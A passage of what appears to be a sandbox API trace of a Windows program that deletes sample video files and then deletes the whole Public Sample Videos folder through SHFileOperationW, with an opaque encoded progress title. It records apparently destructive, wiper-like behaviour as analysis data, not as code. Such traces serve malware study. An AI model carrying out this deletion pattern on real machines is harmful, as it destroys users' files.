lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8bf068, dwReserved1=0x413764, cFileName="..", cAlternateFileName="")) returned 1 [0268.586] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be12937, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0x8bf068, dwReserved1=0x413764, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0268.586] DeleteFileW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini")) returned 1 [0268.587] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be12937, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x1907b8a, dwReserved0=0x8bf068, dwReserved1=0x413764, cFileName="Wildlife.wmv", cAlternateFileName="")) returned 1 [0268.587] DeleteFileW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv")) returned 1 [0268.588] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be12937, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x1907b8a, dwReserved0=0x8bf068, dwReserved1=0x413764, cFileName="Wildlife.wmv", cAlternateFileName="")) returned 0 [0268.588] FindClose (in: hFindFile=0xaa59a0 | out: hFindFile=0xaa59a0) returned 1 [0268.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0268.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0268.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0268.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0268.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0268.588] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0268.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0268.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0268.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0268.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0268.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0268.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0268.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0268.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3570 [0268.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0268.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0268.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0268.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0268.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0268.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3570 | out: hHeap=0x25c0000) returned 1 [0268.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0268.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0268.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0268.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0268.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0268.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0268.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0268.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0268.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0268.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0268.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0268.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0268.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0268.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0268.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0268.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4a) returned 0x240a4d0 [0268.590] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos/Sample Videos", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos", lpFilePart=0x8bf658*="Sample Videos") returned 0x24 [0268.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0268.590] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos" (normalized: "c:\\users\\public\\videos\\sample videos")) returned 0x11 [0268.590] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\Public\\Videos\\Sample Videos", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\xdef8\xfb6f\x26b9\xdd9c\x5e86\xb736\x7a02\xa3b7\xe680\xe9fa\x39ad\x9905\x77df\xb6a9\x505\xb8f4\xbf46\x9680\x9529\x211f\xd12e\x907\x8448\x208d\xb611\xb27a\xe315\xc07e\x7a73\x5886\xea4d\x6d3d\xd0d3\xf651\x682f\xf56c\x769e\xc060\x1df8\x8c04\xa715\x2a41\x78a9\xbc42\xc8a6\x20fa\xa700\x7170\xfc5\xb3c2\x3b75\xe368\xcb35\xae56\xcbd2\x4a57\xa545\xb7f7\x3207\x3188\xe9fe\x51cf\xbe5b\xf808\x843\x58de\x3f46\xd8ce\x72fa\x2eb\xb41\x12d6\xa688\x69da\x30a7\xf131\x7682\xdab2\xf8a9\x313a\xce8f\xd38\x59aa\x9701\x3245\x2220\x6fc3\xcfdd\x1fbd\x7177\xc311\x5b4c\x15b6\xad0a\xd483\x7d66\x58c7\x34d3\x6bb3\x5e3a\xc5e5\x83c\xe28a\xc443\xf99f\x476d\xfb10\x42d1\x4dac\xdbd4\x3d8c\x792b\x5e08\x57b0\xc5a5\x3e5d\x4b9b\x82f7\x2c0\x4c2b\x8f8e\x16d6\x6b58\x5026\x9d6f\x5d0d\x5d17\xe6f8\xb780\x81d2\xde90\x2139\x5bd7\xce7\xc324\xa6b\xa6be\xee8\xacd5\x7af5\x9476\xc234\x6057\x260c\x8641\xe90d\x51f5\x41e1\xa4c0\x27a0\x706a\xf122\x8e62\xc87f\xd605\x20ed\x9b64\xf40d\xf402\xbbf9\x5a1f\xbbca\x7a8b\x82f\x733c\x60\xe517\x69f8\xbc29\xda7f\x7ecb\xed47\x6f13\x8192\x6e33\xb91b\x3d43\xead1\x591d\x4de3\x5ae\x7146\x4435\xda72\x5765\x8bf5\x4498\x7136\x2dd2\x6084\xbd97\x801f\xfa2d\xb168\x3c96\xe7f7\x5ac8\xc892\x12d7\xce31\xd39b\x5980\x21a8\x6162\x43d7\x1370\x1172\x7976\x5a07\x9109\xa76f\x7e3e\x963f\x5a0f\x75f0\xc5d3\x17c6\x80f2\x4b15\x790\x6998\x77ee\xe1b8\x106e\x4e7b\xb858\xb4cc\xdf97\x2186\x646e\xed7f\x6c2b\xbd58\xb37c\xece3\x9927\x707b\x755f\xf280\x7ca6\xadbd\xe05f\x6266\x56d6\xe8d4\x883e\x1c0b\x6ff5\x8b29\xf9fc\x4737\x290c\x7e67\xb211\x1bf5\x2a65\x3492\x1bbe\x96be\xa236\xc209\x1903\x16b7\x5284\xe42c\x2b44\x6477\x5918\xafeb\xd3ac\xa3f7\xce3f\xe050\x8d69\x5d72\x5cec\xa1ca\xc84d\x5912\xc2d0\xec77\xb9f2\x7054\xf423\xfb63\xb87d\xa672\xfbfd\xbe3e\x176\xe457\x4a2e\x72b9\x2140\x414\xe0a6\x704\x6193\xc282\x4276\x84f7\x443f\x8365\xe71d\x1acb\x488\xc8a2\x6c4b\xc05c\x9acf\x2753\x3068\x3c6\xda40\x957f\x12f4\x1ff6\xe2d0\x7d85\x7695\xafd3\x1d41\x693b\xee82\x2ae3\x4200\xe79a\xe2ce\xd3f6\xb26b\xaaf7\x4fd5\xe162\xc869\xb82e\x1d44\x682a\x9215\x4834\x9cd5\xd802\xdcbb\xacc3\x9ab2\xe78b\x8d95\x835c\x21e3\x6058\x50b3\x810\x70ae\x35f\xf962\x58c2\x1022\xcc01\xdbb4\x92de\x9184\x7696\x92b3\x7c3e\x9cf6\x6695\xc520\x6d38\x89ea\x85c0\xd69e\x97a\xd6e8\x4d0f\xb53\xef3d\x2ec6\xa308\xa94c\x4fcb\x6797\xc44\x8033\xc11f\x8845\xe71f\xefae\xea30\x301d\xbfc2\xb004\x111a\xbfe3\xd336\x6f96\xc5c1\x59bd\xd3f8\xd102\x44e3\x3a0c\x8db\x780\x8854\x9dc9\xe7c7\x5b0a\x5bb2\x9c8a\x425b\x351f\x2818\x497\xca94\xda0d\x4dd9\xb56c\x1319\x9034\x40e\x6faa\x53f8\xd504\xf1ed\x3ea8\xa408\x151e\xc3c5\x619b\x3716\x120d\x57a2\x8746\xd1df\xb65b\xd0d\x7e5b\x220d\x78c6\x1e1d\x9061\xad6a\xdd1\xc895\xc856\x1fb1\x6791\x4d87\xf917\xffb4\xf977\x408a\x1bd3\x6cbf\x6432\x1eb5\xc626\x23b8\xa052\xc31f\xd7d\x1c98\x6e07\xee8f\xffa\xb60a\x4729\x727a\xd2c3\x61bb\x4e33\xb9ea\x43fb\xdd5b\x171c\x6586\x7940\x2bf4\xb342\xa171\x6a19\x772c\x7ac8\x681a\x6641\x23da\x9198\x66ee\x7e97\xe38f\x1236\x1af7\xc49d\x15dc\xfd8\x4e99\x51fb\x9c58\xcdd2\x2277\x8f0d\x481c\xd330\xd96e\x452c\xb4d2\x3e04\xef3d\x5236\xbe54\xe15b\x8a76\xfa5\x647b\x9f8c\x8259\xeec2\x7660\xb019\x4d9b\xe117\x3cac\x6f89\xc9b8\x7ec7\x9fb\x6e54\xac3d\xc685\x4196\x7e95\xdc63\x9247\xc89e\x2927\xe77c\x3c26\xc93a\xba32\x3485\xee8f\xcc11\x8493\x922\x2e9e\x2504\xfc7c\x24a6\xb04c\xce5\x8cf7\xe168\x399\x17\x6c3a\x117e\x3b8\xa133\x7f14\xdc70\xe147\xe604\xcd3d\xa493\xe5be\xddc7\x741a\xac5\x173f\xc1e9\x210a\x47f9\xcfd6\x2ade\x7645\xc17\x2305\xe20\x72ac\xc0e3\xdc05\xa8a4\xf81e\x1fc4\xca17\x4db8\x689\x132d\x29c2\x783b\x2485\xcc98\xdca8\x4633\x7abb\xb74\xfe60\xba3d\x514b\x6813\x4f0d\x9c10\x26e5\xcd98\x9846\x6fc3\xc5ab\xba1c\x896e\xc7ec\x6998\x31c7\x6e8a\x8ee9\x6498\xb90a\xd4d4\xa662\x5e3d\xb82d\x18fb\x7fc4\xd374\x388e\xcdb5\xc646\x8595\x736f\xda35\x8188\xec8c\xa426\x2c2f\x4cd6\x4bfb\xcf75\x8b59\xc8bc\xf8fe\x9eac\xcda\xfe0e\xd617\x6d96\x7d62\x7973\x807d\x1725\xea47\xedcb\x6fa9\xd62e\x30b2\x5f56\x7c71\xf57d\xfa91\x87ae\x666c\x6183\x565a\x83fc\x18d7\xb5f1\xf6a4\x2b7b\xfb90\x7fd9\x939\x6d44\x522b\x39b7\xa6ea\xbe6a\x485f\x33ed\xec05\x38a6\xe4d8\x4c28\xb015\x7131\x8bb0\xb0a2\x42b\x606c\x2c1c\x3aa9\x33e2\xc208\x3dad\xc04d\x26bb\x3c02\x4851\xedac\xda66\x8dc6\x1b3d\x1928\x9b51\xb50d\xf8e7\x5051\xacac\xe879\xc82a\x7f9\x89c8\x3946\x5dc8\xb98d\x71fb\x6d9\xbc96\xa356\xe1fb\xbe50\x5bac\x5d68\x6ed0\xf3f7\xa45d\xea17\x1aa2\xf473\x651c\xe1ea\xb8dd\xf393\x46d4\x31be\xe5f6\x1eee\x93d7\xbedf\xa3c9\x3cc2\x19aa\xbf8a\x2275\xd2d7\x1b26\xa188\x42b\xf4\xb342\x37ed\xe44c\xff7b\xbd00\x4386\x14ef\x6d0\x7501\xa0c5\x7117\x9e68\x6e80\x5012\xc4b\xe0ea\x11d0\xba02\x4045\xe3ff\x428b\x5e